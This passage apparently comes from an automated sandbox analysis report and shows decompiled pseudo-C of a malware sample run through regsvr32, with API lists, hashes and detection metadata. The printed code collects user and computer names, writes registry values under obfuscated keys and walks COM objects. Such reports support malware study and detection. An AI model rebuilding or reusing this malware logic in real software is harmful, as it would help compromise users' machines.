										_v16 = _t63;
									}
								}
							}
						}
					}
				}
				return _v16;
			}














                                                  0x00c87657
                                                  0x00c8765a
                                                  0x00c8765d
                                                  0x00c87663
                                                  0x00c87668
                                                  0x00c8766e
                                                  0x00c87676
                                                  0x00c87679
                                                  0x00c8767f
                                                  0x00c87684
                                                  0x00c87691
                                                  0x00c8769e
                                                  0x00c876a2
                                                  0x00c876a4
                                                  0x00c876a8
                                                  0x00c876ab
                                                  0x00c876bb
                                                  0x00c8770d
                                                  0x00c8770e
                                                  0x00c876bd
                                                  0x00c876c0
                                                  0x00c876c7
                                                  0x00c876ca
                                                  0x00c876dd
                                                  0x00000000
                                                  0x00c876df
                                                  0x00c876e2
                                                  0x00c876e7
                                                  0x00c876f5
                                                  0x00c876f8
                                                  0x00c87700
                                                  0x00c87703
                                                  0x00000000
                                                  0x00c87705
                                                  0x00c87705
                                                  0x00c87708
                                                  0x00c87708
                                                  0x00c87703
                                                  0x00c876dd
                                                  0x00c87713
                                                  0x00c87714
                                                  0x00c87684
                                                  0x00c8771a

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,00C8A338), ref: 00C8765D
                                                  • GetComputerNameW.KERNEL32(00000000,00C8A338), ref: 00C87679
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  • GetUserNameW.ADVAPI32(00000000,00C8A338), ref: 00C876B3
                                                  • GetComputerNameW.KERNEL32(00C8A338,?), ref: 00C876D5
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00C8A338,00000000,00C8A33A,00000000,00000000,?,?,00C8A338), ref: 00C876F8
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                  • String ID:
                                                  • API String ID: 3850880919-0
                                                  • Opcode ID: c2eb33288987ace5d2332d78b241b894d63e35e3ac42f6d201915d34cad06d8c
                                                  • Instruction ID: eee6791447af2ace2851c98787423133cfc36e715ab6aaeed44610b24aea138b
                                                  • Opcode Fuzzy Hash: c2eb33288987ace5d2332d78b241b894d63e35e3ac42f6d201915d34cad06d8c
                                                  • Instruction Fuzzy Hash: D821D776900208FBCB11EFE9D988DEEBBB8EE44344B6045AAE511E7240E7309F44DB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C81585, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E00C81585(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E00C87F27(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E00C8A9AB(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0xc8d130() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                                  0x00c81585
                                                  0x00c81592
                                                  0x00c81594
                                                  0x00c815f7
                                                  0x00000000
                                                  0x00c815f7
                                                  0x00c815ac
                                                  0x00c815b3
                                                  0x00c815bf
                                                  0x00c815c4
                                                  0x00c815c6
                                                  0x00c815c8
                                                  0x00c815ca
                                                  0x00c815cc
                                                  0x00c815ce
                                                  0x00c815da
                                                  0x00c815ea
                                                  0x00000000
                                                  0x00c815dc
                                                  0x00c815dc
                                                  0x00c815e3
                                                  0x00c815f0
                                                  0x00c815f0
                                                  0x00c815f0
                                                  0x00c815e3
                                                  0x00c815da
                                                  0x00c815f5
                                                  0x00000000
                                                  0x00000000
                                                  0x00c815fb

                                                  APIs
                                                  • ResetEvent.KERNEL32(?,00000008,?,?,00000102,00C811DA,?,?,00000000,00000000), ref: 00C815BF
                                                  • ResetEvent.KERNEL32(?), ref: 00C815C4
                                                  • GetLastError.KERNEL32 ref: 00C815DC
                                                  • GetLastError.KERNEL32(?,?,00000102,00C811DA,?,?,00000000,00000000), ref: 00C815F7
                                                    • Part of subcall function 00C87F27: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,00C815A4,?,?,?,?,00000102,00C811DA,?,?,00000000), ref: 00C87F33
                                                    • Part of subcall function 00C87F27: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00C815A4,?,?,?,?,00000102,00C811DA,?), ref: 00C87F91
                                                    • Part of subcall function 00C87F27: lstrcpy.KERNEL32(00000000,00000000), ref: 00C87FA1
                                                  • SetEvent.KERNEL32(?), ref: 00C815EA
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1449191863-0
                                                  • Opcode ID: f8c608b0da25c6257a3c6adc4a94e6e57531e9497c282807f3d2bb096a61db94
                                                  • Instruction ID: 2da50c62f6bd62907c22cbe47b6ddfe4dbb79216df0960b8cbf6eac4c5a94c62
                                                  • Opcode Fuzzy Hash: f8c608b0da25c6257a3c6adc4a94e6e57531e9497c282807f3d2bb096a61db94
                                                  • Instruction Fuzzy Hash: AD01A231104601ABD6307B71EC44F1F76ECEF84768F244A25F966D10F0D730E916A729
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C88F10, Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00C88F10(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t13;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xc8d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t13 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0xc8d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0xc8d258 = _t6;
					 *0xc8d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0xc8d254 = _t7;
					if(_t7 == 0) {
						 *0xc8d254 =  *0xc8d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 > 0) {
					goto L5;
				}
				_t13 = _t4 - _t4;
				goto L4;
			}









                                                  0x00c88f18
                                                  0x00c88f20
                                                  0x00c88f25
                                                  0x00000000
                                                  0x00c88f7a
                                                  0x00c88f27
                                                  0x00c88f2f
                                                  0x00c88f37
                                                  0x00c88f37
                                                  0x00c88f77
                                                  0x00000000
                                                  0x00c88f77
                                                  0x00c88f39
                                                  0x00c88f39
                                                  0x00c88f3e
                                                  0x00c88f50
                                                  0x00c88f55
                                                  0x00c88f5b
                                                  0x00c88f63
                                                  0x00c88f68
                                                  0x00c88f6a
                                                  0x00c88f6a
                                                  0x00000000
                                                  0x00c88f71
                                                  0x00c88f33
                                                  0x00000000
                                                  0x00000000
                                                  0x00c88f35
                                                  0x00000000

                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00C86A90,?,?,00000001,?,?,?,00C8807D,?), ref: 00C88F18
                                                  • GetVersion.KERNEL32(?,00000001,?,?,?,00C8807D,?), ref: 00C88F27
                                                  • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,00C8807D,?), ref: 00C88F3E
                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,00C8807D,?), ref: 00C88F5B
                                                  • GetLastError.KERNEL32(?,00000001,?,?,?,00C8807D,?), ref: 00C88F7A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                  • String ID:
                                                  • API String ID: 2270775618-0
                                                  • Opcode ID: f95c4a85679a51b875e4f44d7ee80f85d762dec91ddaa9078db1098a961bbf68
                                                  • Instruction ID: 93db355ff8ee161da211f97c4e36a51daaf941d90dd95dcfa2d043ae61ffa30c
                                                  • Opcode Fuzzy Hash: f95c4a85679a51b875e4f44d7ee80f85d762dec91ddaa9078db1098a961bbf68
                                                  • Instruction Fuzzy Hash: ECF0A930690341EAEB60BFB4AD48B1C3BB2AB45784F900519F262C61E0DB708909CB2D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C817D5, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 172stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E00C817D5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t97;
				void* _t98;
				char _t104;
				signed int* _t106;
				intOrPtr* _t107;
				void* _t108;

				_t98 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t104 = _a16;
				if(_t104 == 0) {
					__imp__( &_v284,  *0xc8d33c);
					_t97 = 0x80000002;
					L6:
					_t60 = E00C8809F(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t107 = _a24;
					if(E00C888B7(_t98, _t103, _t107, _t97, _t60) != 0) {
						L27:
						E00C89039(_a8);
						goto L29;
					}
					_t65 =  *0xc8d27c; // 0x41a5a8
					_t16 = _t65 + 0xc8e8fe; // 0x65696c43
					_t68 = E00C8809F(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t107 + 0x14; // 0x102
						_t33 = _t107 + 0x10; // 0x3d00c8c0
						if(E00C8A635(_t103,  *_t33, _t97, _a8,  *0xc8d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0xc8d27c; // 0x41a5a8
							if(_t104 == 0) {
								_t35 = _t72 + 0xc8ea5f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0xc8e89f; // 0x55434b48
								_t73 = _t34;
							}
							if(E00C8816C(_t73,  *0xc8d334,  *0xc8d338,  &_a24,  &_a16) == 0) {
								if(_t104 == 0) {
									_t75 =  *0xc8d27c; // 0x41a5a8
									_t44 = _t75 + 0xc8e871; // 0x74666f53
									_t78 = E00C8809F(0, _t44);
									_t105 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t107 + 0x10; // 0x3d00c8c0
										E00C82659( *_t47, _t97, _a8,  *0xc8d338, _a24);
										_t49 = _t107 + 0x10; // 0x3d00c8c0
										E00C82659( *_t49, _t97, _t105,  *0xc8d330, _a16);
										E00C89039(_t105);
									}
								} else {
									_t40 = _t107 + 0x10; // 0x3d00c8c0
									E00C82659( *_t40, _t97, _a8,  *0xc8d338, _a24);
									_t43 = _t107 + 0x10; // 0x3d00c8c0
									E00C82659( *_t43, _t97, _a8,  *0xc8d330, _a16);
								}
								if( *_t107 != 0) {
									E00C89039(_a24);
								} else {
									 *_t107 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t107 + 0x10; // 0x3d00c8c0
					if(E00C86BFA( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t106 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t106 =  *_t106 & 0x00000000;
							_t26 = _t107 + 0x10; // 0x3d00c8c0
							E00C8A635(_t103,  *_t26, _t97, _a8, _a24, _t106);
						}
						E00C89039(_t106);
						_t104 = _a16;
					}
					E00C89039(_a24);
					goto L14;
				}
				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t103 = _a8;
					E00C8A8D8(_t104, _a8,  &_v284);
					__imp__(_t108 + _t104 - 0x117,  *0xc8d33c);
					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
					_t97 = 0x80000003;
					goto L6;
				}
			}























                                                  0x00c817d5
                                                  0x00c817de
                                                  0x00c817e5
                                                  0x00c817ea
                                                  0x00c81857
                                                  0x00c8185d
                                                  0x00c81862
                                                  0x00c8186b
                                                  0x00c81872
                                                  0x00c81875
                                                  0x00c819e9
                                                  0x00c819f0
                                                  0x00c819f0
                                                  0x00c819f5
                                                  0x00c819f7
                                                  0x00c819f7
                                                  0x00c81a00
                                                  0x00c81a00
                                                  0x00c8187b
                                                  0x00c81887
                                                  0x00c819df
                                                  0x00c819e2
                                                  0x00000000
                                                  0x00c819e2
                                                  0x00c8188d
                                                  0x00c81892
                                                  0x00c8189b
                                                  0x00c818a2
                                                  0x00c818a5
                                                  0x00c818ef
                                                  0x00c818ef
                                                  0x00c81902
                                                  0x00c8190c
                                                  0x00c81914
                                                  0x00c81919
                                                  0x00c81923
                                                  0x00c81923
                                                  0x00c8191b
                                                  0x00c8191b
                                                  0x00c8191b
                                                  0x00c8191b
                                                  0x00c81945
                                                  0x00c8194d
                                                  0x00c8197b
                                                  0x00c81980
                                                  0x00c81989
                                                  0x00c8198e
                                                  0x00c81992
                                                  0x00c819c4
                                                  0x00c81994
                                                  0x00c819a1
                                                  0x00c819a4
                                                  0x00c819b4
                                                  0x00c819b7
                                                  0x00c819bd
                                                  0x00c819bd
                                                  0x00c8194f
                                                  0x00c8195c
                                                  0x00c8195f
                                                  0x00c81971
                                                  0x00c81974
                                                  0x00c81974
                                                  0x00c819ce
                                                  0x00c819da
                                                  0x00c819d0
                                                  0x00c819d3
                                                  0x00c819d3
                                                  0x00c819ce
                                                  0x00c81945
                                                  0x00000000
                                                  0x00c8190c
                                                  0x00c818b4
                                                  0x00c818be
                                                  0x00c818c0
                                                  0x00c818c5
                                                  0x00c818c9
                                                  0x00c818cb
                                                  0x00c818d6
                                                  0x00c818d9
                                                  0x00c818d9
                                                  0x00c818df
                                                  0x00c818e4
                                                  0x00c818e4
                                                  0x00c818ea
                                                  0x00000000
                                                  0x00c818ea
                                                  0x00c817ef
                                                  0x00000000
                                                  0x00c81816
                                                  0x00c81816
                                                  0x00c81822
                                                  0x00c81835
                                                  0x00c8183b
                                                  0x00c81843
                                                  0x00000000
                                                  0x00c81843

                                                  APIs
                                                  • StrChrA.SHLWAPI(00C83C81,0000005F,00000000,00000000,00000104), ref: 00C81808
                                                  • lstrcpy.KERNEL32(?,?), ref: 00C81835
                                                    • Part of subcall function 00C8809F: lstrlen.KERNEL32(?,00000000,00C8D330,00000001,00C82200,00C8D00C,00C8D00C,00000000,00000005,00000000,00000000,?,?,?,00C896C1,00C823E9), ref: 00C880A8
                                                    • Part of subcall function 00C8809F: mbstowcs.NTDLL ref: 00C880CF
                                                    • Part of subcall function 00C8809F: memset.NTDLL ref: 00C880E1
                                                    • Part of subcall function 00C82659: lstrlenW.KERNEL32(00C83C81,?,?,00C819A9,3D00C8C0,80000002,00C83C81,00C88B1E,74666F53,4D4C4B48,00C88B1E,?,3D00C8C0,80000002,00C83C81,?), ref: 00C82679
                                                    • Part of subcall function 00C89039: HeapFree.KERNEL32(00000000,00000000,00C87F18,00000000,?,?,00000000), ref: 00C89045
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00C81857
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                  • String ID: \
                                                  • API String ID: 3924217599-2967466578
                                                  • Opcode ID: d635e23f7708d1268480f5ffe0fdef74b4e5a642e077772fe7a46410f955a8a3
                                                  • Instruction ID: 288e14c200596e4a3b7c922039785d92cd65060a77d9fbf3711a210b1e54cdfe
                                                  • Opcode Fuzzy Hash: d635e23f7708d1268480f5ffe0fdef74b4e5a642e077772fe7a46410f955a8a3
                                                  • Instruction Fuzzy Hash: C9514772100209EFDF11BFA1DD45EAE37FEAB08358F148415FA26971A1E731DE16AB18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C852F9, Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 46%
                                                  			E00C852F9(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0xc8d27c; // 0x41a5a8
					_t5 = _t102 + 0xc8e038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0xc8c2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0xc8d27c; // 0x41a5a8
												_t28 = _t108 + 0xc8e0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0xc8d27c; // 0x41a5a8
														_t33 = _t78 + 0xc8e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                                                  0x00c852fe
                                                  0x00c85307
                                                  0x00c85308
                                                  0x00c8530c
                                                  0x00c85312
                                                  0x00c85318
                                                  0x00c85321
                                                  0x00c85327
                                                  0x00c85331
                                                  0x00c85333
                                                  0x00c85339
                                                  0x00c8533e
                                                  0x00c85349
                                                  0x00c85351
                                                  0x00c85354
                                                  0x00c85477
                                                  0x00c8535a
                                                  0x00c8535a
                                                  0x00c85367
                                                  0x00c8536d
                                                  0x00c85373
                                                  0x00c85377
                                                  0x00c8537d
                                                  0x00c8538a
                                                  0x00c8538e
                                                  0x00c85394
                                                  0x00c85397
                                                  0x00c8539d
                                                  0x00c853a3
                                                  0x00c853a9
                                                  0x00c853ac
                                                  0x00c853af
                                                  0x00c853b5
                                                  0x00c853be
                                                  0x00c853c4
                                                  0x00c853c5
                                                  0x00c853c8
                                                  0x00c853c9
                                                  0x00c853ca
                                                  0x00c853d2
                                                  0x00c853d3
                                                  0x00c853d4
                                                  0x00c853d6
                                                  0x00c853da
                                                  0x00c853de
                                                  0x00000000
                                                  0x00000000
                                                  0x00c853e4
                                                  0x00c853ed
                                                  0x00c853f3
                                                  0x00c853fd
                                                  0x00c85401
                                                  0x00c85403
                                                  0x00c85410
                                                  0x00c85414
                                                  0x00c8541c
                                                  0x00c85421
                                                  0x00c85433
                                                  0x00c85435
                                                  0x00c8543b
                                                  0x00c8543b
                                                  0x00c85444
                                                  0x00c85444
                                                  0x00c85446
                                                  0x00c8544c
                                                  0x00c8544c
                                                  0x00c8544f
                                                  0x00c85455
                                                  0x00c85458
                                                  0x00c85461
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00c85461
                                                  0x00c853b5
                                                  0x00c853af
                                                  0x00c85397
                                                  0x00c85467
                                                  0x00c85467
                                                  0x00c8546d
                                                  0x00c8546d
                                                  0x00c85473
                                                  0x00c85473
                                                  0x00c8547c
                                                  0x00c85482
                                                  0x00c85482
                                                  0x00c8533e
                                                  0x00c8548b

                                                  APIs
                                                  • SysAllocString.OLEAUT32(00C8C2B0), ref: 00C85349
                                                  • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00C8542B
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00C85444
                                                  • SysFreeString.OLEAUT32(?), ref: 00C85473
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloclstrcmp
                                                  • String ID:
                                                  • API String ID: 1885612795-0
                                                  • Opcode ID: 5d95dd92e84a7aab47c43fb278f6956b8f855d25f1a8250a16500eecfc84f48d
                                                  • Instruction ID: e0e462265b3f35645d19fb492089eaf2c190ba4ffe4ece70cd8ba9e4c1d1597f
                                                  • Opcode Fuzzy Hash: 5d95dd92e84a7aab47c43fb278f6956b8f855d25f1a8250a16500eecfc84f48d
                                                  • Instruction Fuzzy Hash: FE516D71D00519EFCB00EFE8C8889AEB7B9EF89705B148598E915EB320D7719D41CFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C81017, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E00C81017(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00C8A7AA(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00C8968F(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E00C88967(_t101,  &_v236, _a8, _t96 - _t81);
					E00C88967(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E00C8968F(_t101,  &E00C8D1B0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00C8968F(_a16, _a4);
						E00C81D6C(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00C8B0C8();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00C8B0C2();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E00C81FB1(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E00C88B62(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00C89100(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E00C8D1B0) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                  0x00c8101a
                                                  0x00c81026
                                                  0x00c8102c
                                                  0x00c81031
                                                  0x00c81035
                                                  0x00c81192
                                                  0x00c81196
                                                  0x00c81196
                                                  0x00c8103b
                                                  0x00c8103f
                                                  0x00c81045
                                                  0x00c81046
                                                  0x00c81051
                                                  0x00c81057
                                                  0x00c8105c
                                                  0x00c8105f
                                                  0x00c81079
                                                  0x00c81085
                                                  0x00c8108e
                                                  0x00c81098
                                                  0x00c8109d
                                                  0x00c8109f
                                                  0x00c810a2
                                                  0x00c81150
                                                  0x00c81156
                                                  0x00c81167
                                                  0x00c8117a
                                                  0x00c8118a
                                                  0x00000000
                                                  0x00c8118f
                                                  0x00c810ab
                                                  0x00c810b2
                                                  0x00c810b6
                                                  0x00c810bc
